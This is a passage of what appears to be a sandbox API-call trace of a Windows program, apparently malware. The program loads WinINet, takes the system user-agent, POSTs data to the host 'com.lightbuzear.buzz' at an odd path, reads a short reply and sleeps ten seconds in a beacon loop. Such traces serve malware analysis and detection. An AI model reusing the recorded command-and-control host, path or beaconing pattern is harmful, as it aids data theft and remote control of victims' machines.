(HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0172.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f650 | out: hHeap=0x4780000) returned 1 [0172.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f650 [0172.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0172.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f718 [0172.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0172.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0172.289] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0172.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0172.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f718 | out: hHeap=0x4780000) returned 1 [0172.289] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0172.289] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0172.289] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0172.290] FreeLibrary (hLibModule=0x71570000) returned 1 [0172.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0172.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0172.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9fc8 | out: hHeap=0x4780000) returned 1 [0172.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f00 | out: hHeap=0x4780000) returned 1 [0172.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9ed8 | out: hHeap=0x4780000) returned 1 [0172.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f78 | out: hHeap=0x4780000) returned 1 [0172.291] Sleep (dwMilliseconds=0x2710) [0172.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0172.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0172.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0172.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0172.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0172.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0172.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0172.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0172.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0172.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0980 [0172.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0172.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0aa0 [0172.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0172.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0172.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0aa0 | out: hHeap=0x4780000) returned 1 [0172.549] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f08a8 [0172.549] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0172.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0172.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0172.549] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f768 [0172.549] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0172.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0172.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0172.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0172.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0980 [0172.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0878 [0172.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0172.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0878 | out: hHeap=0x4780000) returned 1 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f560 [0172.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0172.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f560 | out: hHeap=0x4780000) returned 1 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f600 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0172.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f678 [0172.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0172.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0172.552] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0172.552] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0172.552] FreeLibrary (hLibModule=0x71780000) returned 1 [0172.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f678 | out: hHeap=0x4780000) returned 1 [0172.553] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0172.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6a0 [0172.553] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0172.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0172.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0172.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0172.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0172.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0172.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0172.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0172.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0172.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0172.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0980 [0172.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0172.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0a58 [0172.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0172.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0172.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0a58 | out: hHeap=0x4780000) returned 1 [0172.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f08c0 [0172.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f790 [0172.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f790 | out: hHeap=0x4780000) returned 1 [0172.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0172.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6c8 [0172.554] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6f0 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0172.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0172.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0172.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0172.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0938 [0172.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0818 [0172.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0938 | out: hHeap=0x4780000) returned 1 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0172.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0818 | out: hHeap=0x4780000) returned 1 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0878 [0172.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f4e8 [0172.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f4e8 | out: hHeap=0x4780000) returned 1 [0172.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0172.556] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0172.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0172.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0172.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0172.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0172.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0172.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0172.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0172.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0172.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0172.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0938 [0172.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0172.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0818 [0172.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0938 | out: hHeap=0x4780000) returned 1 [0172.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0172.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0818 | out: hHeap=0x4780000) returned 1 [0172.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f678 [0172.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0172.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0172.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f678 | out: hHeap=0x4780000) returned 1 [0172.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f718 [0172.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0172.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f790 [0172.561] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0172.562] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0172.562] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0172.562] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0172.562] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f790 | out: hHeap=0x4780000) returned 1 [0172.562] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0172.562] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0172.562] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0172.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0172.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0172.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f09e0 [0172.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0818 [0172.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09e0 | out: hHeap=0x4780000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0172.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0818 | out: hHeap=0x4780000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f790 [0172.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0172.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f790 | out: hHeap=0x4780000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f790 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0172.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f678 [0172.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0172.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0172.564] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0172.564] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0173.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f678 | out: hHeap=0x4780000) returned 1 [0173.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0173.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0173.898] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0173.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0173.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0173.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0173.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0173.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0173.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f09b0 [0173.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09c8 [0173.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0173.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09c8 | out: hHeap=0x4780000) returned 1 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f678 [0173.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0173.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f678 | out: hHeap=0x4780000) returned 1 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f4e8 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0173.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0173.900] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0173.900] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0173.901] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0173.901] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0173.901] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0173.908] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0173.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0173.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0173.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0173.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0173.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0938 [0173.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0980 [0173.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0938 | out: hHeap=0x4780000) returned 1 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0173.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f5b0 [0173.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0173.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5d8 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0173.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0173.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0173.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0173.910] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0173.910] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0173.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0173.911] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0173.911] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0173.911] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0173.911] FreeLibrary (hLibModule=0x71570000) returned 1 [0173.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0173.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0173.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6f0 | out: hHeap=0x4780000) returned 1 [0173.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6c8 | out: hHeap=0x4780000) returned 1 [0173.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6a0 | out: hHeap=0x4780000) returned 1 [0173.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f768 | out: hHeap=0x4780000) returned 1 [0173.914] Sleep (dwMilliseconds=0x2710) [0173.930] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0173.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0173.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0173.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0173.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0173.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 